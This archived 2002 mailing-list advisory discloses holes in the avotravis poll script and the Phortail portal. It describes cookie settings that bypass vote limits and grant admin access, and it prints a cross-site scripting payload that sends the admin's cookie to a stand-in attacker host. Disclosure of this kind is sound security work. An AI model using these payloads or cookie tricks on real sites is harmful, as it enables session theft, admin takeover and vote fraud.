('binary' encoding is not supported, stored as-is) The first one is poll "avotravis " versions 2.1 and less. 1) Distortion of the limitations of multiple votes : Set the cookie with the name "already_voted" and value "1" to the url /avotravis.php3?vote=1 for "yes" and /avotravis.php3?vote=1 for "no". 2) Access to the part administration : Set the cookie "adminsondage", "true" to the webpage http://www.host.com/admin.php3 More details in french : http://www.ifrance.com/kitetoua/tuto/avotravis.txt The second is the portal "Phortail" versions 1.2.1 and less. Admin password is sent uncrypted by cookie and there isn't limitation in the posting of the news for the scripts. It is enough to send this kind of script : <im*g src="javascri*pt:phortail()"> <s*cript>function phortail() { a="http://haxor.com/file?"+document.cookie; window.open(a); } </s*cript> (without '*') like a new and wait the admin... More details in french : http://www.ifrance.com/kitetoua/tuto/phortail.txt Creators are alerted. Sorry for my bad english. frog-m@n
This archive was generated by hypermail 2b30 : Mon Mar 04 2002 - 22:53:43 PST